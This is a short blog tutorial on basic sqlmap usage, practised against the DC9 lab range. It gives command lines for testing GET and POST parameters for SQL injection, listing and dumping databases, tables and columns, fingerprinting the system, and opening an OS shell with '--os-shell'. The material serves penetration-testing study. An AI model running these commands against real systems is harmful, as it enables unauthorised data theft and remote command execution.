当前位置:网站首页>Basic usage of sqlmap
Basic usage of sqlmap
2022-07-03 10:51:00 【Tianxia (Tianyan teacher)】
This article only introduces sqlmap Simple use method , Refer to official documentation
https://github.com/sqlmapproject/sqlmap/wiki/Usage
csdn The master
https://blog.csdn.net/Breeze_CAT/article/details/80628392
Personal advice , See the specific parameters directly csdn Master's , This article takes DC9 Take the shooting range as the target to practice , Use sqlmap Get target data or permissions
GET type
sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4
-u
Enter your destination address --batch
Automatically enter the attribute value of the option --level
Set the test level (1-5, The default is 1)lv2:cookie Inject ; lv3:user-agent Inject ,lv4:refere Inject ; lv5:host Inject
POST type
You can get the request package of the corresponding address , Use bp Just grab and save
sqlmap -u ceshi.txt --batch --level 4
perhaps
sqlmap -u http://192.168.43.143/results.php --method=POST --data="search=1" --level 4 --batch
--method
Select the method of parameter transmission --data
Select the passed in parameters
sqlmap -u http://192.168.43.143/results.php --method=POST --data="search=1" --level 4 --batch --random-agent
--random-agent
Use random UA head sqlmap -r ceshi.txt --batch --current-db
View the current database --current-db
View the current database
Query database content
View the name of the owned database
sqlmap -r ceshi.txt --batch --dbs --level 4
Select database , The query table name
sqlmap -r cesh.txt --batch -D shujuku --tables
Query the column names in the table
sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns
View the contents of some columns in the table
sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump
--dump
Download means , The preceding parameters are the content to be downloaded
sqlmap -r ceshi.txt --batch --dump-all
--dump-all
Means Download all , That is, take off your pants
view the database , Correspondence of table contents
sqlmap -r ceshi.txt --schema
--schema
Target database database system management mode , Similar to a topological graph
Write Trojan , Carry out orders
sqlmap -r ceshi.txt --os-shell
sqlmap Will automatically find the path to write shell
fingerprint identification
sqlmap -r ceshi.txt -f --dbs
When the target has injection , Use -f
Parameter to get the target operating system information
边栏推荐
- Bid -- service commitment -- self summary
- How to make a blood bar in the game
- 帶你走進雲原生數據庫界扛把子Amazon Aurora
- QT:QSS自定义 QScrollBar实例
- How does MySQL find the latest data row that meets the conditions?
- 7、 Data definition language of MySQL (2)
- 现在零基础转行软件测试还OK吗?
- Content type ‘application/x-www-form-urlencoded; charset=UTF-8‘ not supported
- What happened to those who focused on automated testing?
- Small file special
猜你喜欢
Set ArrayList nested map set loop traversal
MySQL reports an error "expression 1 of select list is not in group by claim and contains nonaggre" solution
Jupiter notebook changing font style and font size
[untitled]
DAY 7 小练习
Detailed cross validation and grid search -- sklearn implementation
Preliminary knowledge of Neural Network Introduction (pytorch)
[SQL] an article takes you to master the operations related to query and modification of SQL database
UI interface design related knowledge (I)
【吐槽&脑洞】关于逛B站时偶然体验的弹幕互动游戏魏蜀吴三国争霸游戏的一些思考
随机推荐
Drop out (pytoch)
How to hide cvxpy warnings: warn: a- > P (column pointers) not strictly increasing, column x empty?
conda9.0+py2.7+tensorflow1.8.0
STM32F1与STM32CubeIDE编程实例-TM1637驱动4位7段数码管
QT:QSS自定义 QSpinBox实例
现在零基础转行软件测试还OK吗?
Binary search method
Mysql--索引原理+如何使用
Day 7 small exercise
QT:QSS自定义 QMenuBar实例
Leetcode skimming ---374
Leetcode skimming ---283
Unity小组工程实践项目《最强外卖员》策划案&纠错文档
Linear regression of introduction to deep learning (pytorch)
7、 Data definition language of MySQL (2)
QT:QSS自定义QListView实例
Hou Jie -- STL source code analysis notes
Wechat applet training 2
Unity学习笔记:联网游戏Pixel Adventure 1学习过程&纠错心得
extern关键字